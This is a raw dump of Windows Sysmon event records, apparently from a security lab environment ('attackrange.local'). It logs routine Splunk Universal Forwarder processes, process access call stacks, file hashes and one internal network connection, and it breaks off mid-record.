10341000x8000000000000000807752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.569{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F5-60EB-7C79-00000000D001}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.556{0C1E0330-F4F5-60EB-7C79-00000000D001}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB1A6BBD5005E396E2BC2E8F1A35F81,SHA256=27D349852DD56A40E314801C466F391496E969CD770B168E598888138C07170B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3144A7F2F7959972567AD179CB344BF3,SHA256=D5711ECBE95985246DB00AA0317E96C79841F32A28853933AC68F9F525BA0CF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:25.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E921234677B48FFF6322965F6F8F522,SHA256=8F1D945BFEB066AC11C16A017C962834D39B7FD237F3FAE6B5F41AFC09B61666,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:25.331{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl3
2.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x8000000000000000807793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F6-60EB-7E79-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000807791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.928{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:26.928{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4F6-60EB-7E79-00000000D001}2896C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F6-60EB-7E79-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.913{0C1E0330-F4F6-60EB-7E79-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.694{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7D9232EF7EDB0C99A489C888735B62F,SHA256=703DA436F02680FF602191DF83A1F9D1044DC5A96B19AB7726A4E06B94F36E68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.694{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3144A7F2F7959972567AD179CB344BF3,SHA256=D5711ECBE95985246DB00AA0317E96C79841F32A28853933AC68F9F525BA0CF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:26.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8947C9C33E0D1F55DBF2E5DE494FB980,SHA256=6833486C69EB13E2E18EE86B3AE470C57FC24EBA77B9FC73AE3B2CF5D738A616,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001049296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.589{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51040-false10.0.1.12-8000- 10341000x80000000000000001049295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:26.194{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf2834
1b1f2\comctl32.dll+587c9 10341000x80000000000000001049294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:26.194{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x8000000000000000807778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F6-60EB-7D79-00000000D001}224C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
